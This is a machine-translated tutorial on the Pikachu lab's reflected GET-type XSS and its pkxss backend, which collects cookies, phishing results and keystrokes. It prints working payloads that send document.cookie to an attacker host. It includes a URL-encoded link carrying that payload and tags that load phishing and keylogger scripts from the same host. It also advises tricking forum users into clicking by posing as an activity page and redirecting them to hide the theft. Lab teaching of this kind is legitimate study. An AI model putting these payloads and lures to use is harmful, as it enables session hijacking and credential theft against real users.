3-5 obtaining cookies through XSS and the use of XSS background management system

XSS Vulnerability testing ：cookie Get and fishing attack Demo

 XSS Vulnerability testing ：cookie Theft and exploitation of

At the same time get type xss The use of ,post type xss The use of

 XSS Vulnerability testing ： Phishing attack

 XSS Vulnerability testing ：xss Get the user's keyboard record

Let's have a better understanding of xss The harm and principle of

Case study 1：xss How to get cookie?

GET type XSS utilize ：cookie obtain

pkxss Introduction to background management

In the source package , There is one pkxss, We can put this catalogue , Put it separately under a directory , This thing is actually a background that can be used independently , We can put it under the site directory alone , To visit it

Start by opening pikachu Website , Under management tools , There is one xss backstage , When used for the first time , It needs to be installed , Before installation , We need to make sure , In our code inc In the folder ,config.inc.php Inside

Make sure your account and password are correct , Let's log in and have a look

Let's order cookie collect

This place is the result display page , By default , There is no data here

cookie Get back-end code analysis

We are pkxss Below directory , There is one xcookie modular , Under this , There is one cookie.php, actually , All the data is sent here

adopt get The way , To get whether it has been sent cookie Give me a , If so, write it down , At the same time, put the... In the request referer、useragent Read it , Then insert it into the database

header("Location:http://192.168.1.4/pikachu/index.php");

I also made a redirection later , Under the actual application scenario , We send a link to others , Someone clicked , It's impossible to pop up a blank page , So , Eventually we have to redirect it to a trusted page , When he finished counting , Don't notice what bad things this link has done , So , We usually redirect it to the home page of the website it visits , Or is it , Some other page , But in our experiment , This place , Will redirect to the home page of the vulnerable website

pkxss_cookie_result.php A file is a page for query , That's what we just saw , Backstage php file

This file is for login , That means only those who log in , To visit , obtain xss Result , This file is directly stored in the database cookie Information , Show me

Next , Let's demonstrate get type xss The process of , Let's remove the character length limit

I've prepared a paragraph here js Code for

pkxss backstage ：
http://192.168.1.15/pkxss/pkxss_login.php

<script>document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit



<img src="http://192.168.1.15/pkxss/xfish/fish.php" />
<script src="http://192.168.1.15/pkxss/xfish/fish.php"></script>

<script src="http://192.168.1.15/pkxss/rkeypress/rk.js"></script>

 Simulated malicious sites ：
http://192.168.1.5/post.html

He will pass document.location The instance , To do a redirect , Once he visits this page ,js Will visit 1.15, our xss backstage , Then when we visit , Whatever cookie Bring it to me , adopt document.cookie This instance goes to get the local cookie, That such , It forms a complete get request , We can copy this paragraph

<script>document.location = 'http://192.168.42.236/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

Put it in the input box , Point submission

He returned to the home page ,js After local execution , Will go back backstage , Theoretically , This is the time , We've got it cookie 了 , Refresh this page

There will be one more record in this place

In the actual scene , We're going to take that url During the transmission of ginseng , Make a code , Put this paragraph url Good copy , Send it directly to the user

http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

for instance , This is an important forum , When we chat with users , Tell him it's an activity page , Deceive users to click , Once the user accesses the link in the browser , He'll jump to the front page , Of course , You can also jump to other pages , The main purpose is to cover up the behavior behind us

This is it. get Type request the following reflection type xss The use of